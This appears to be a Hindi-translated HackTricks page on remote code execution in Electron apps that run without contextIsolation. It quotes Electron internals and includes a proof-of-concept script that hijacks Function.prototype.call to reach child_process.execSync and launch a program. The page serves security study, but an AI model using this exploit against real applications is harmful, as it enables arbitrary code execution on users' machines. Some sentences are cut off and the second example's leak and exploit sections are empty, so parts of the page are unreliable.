Electron contextIsolation RCE via Electron internal code

htARTE (HackTricks AWS Red Team Expert) के साथ जीरो से हीरो तक AWS हैकिंग सीखें!

उदाहरण 1

उदाहरण https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41 से

"exit" घटना सुनने वाला लिस्टनर हमेशा आंतरिक कोड द्वारा सेट किया जाता है जब पृष्ठ लोड होना शुरू होता है। यह घटना नेविगेशन से ठीक पहले उत्पन्न होती है:

process.on('exit', function (){
for (let p in cachedArchives) {
if (!hasProp.call(cachedArchives, p)) continue
cachedArchives[p].destroy()
}
})

https://github.com/nodejs/node/blob/8a44289089a08b7b19fa3c4651b5f1f5d1edd71b/bin/events.js#L156-L231 -- अब मौजूद नहीं है

फिर यहाँ जाता है:

जहां "self" Node की प्रक्रिया वस्तु है:

प्रक्रिया वस्तु में "require" फ़ंक्शन को संदर्भ है:

process.mainModule.require

जैसे हैंडलर.call प्रक्रिया ऑब्ज

<script>
Function.prototype.call = function(process){
process.mainModule.require('child_process').execSync('calc');
}
location.reload();//Trigger the "exit" event
</script>

उदाहरण 2

प्रोटोटाइप प्रदूषण से रिक्वायर ऑब्जेक्ट प्राप्त करेंhttps://www.youtube.com/watch?v=Tzo8ucHA5xw&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq&index=81

लीक:

शोषण:

जानें AWS हैकिंग को शून्य से हीरो तक htARTE (HackTricks AWS Red Team Expert)!

Last updated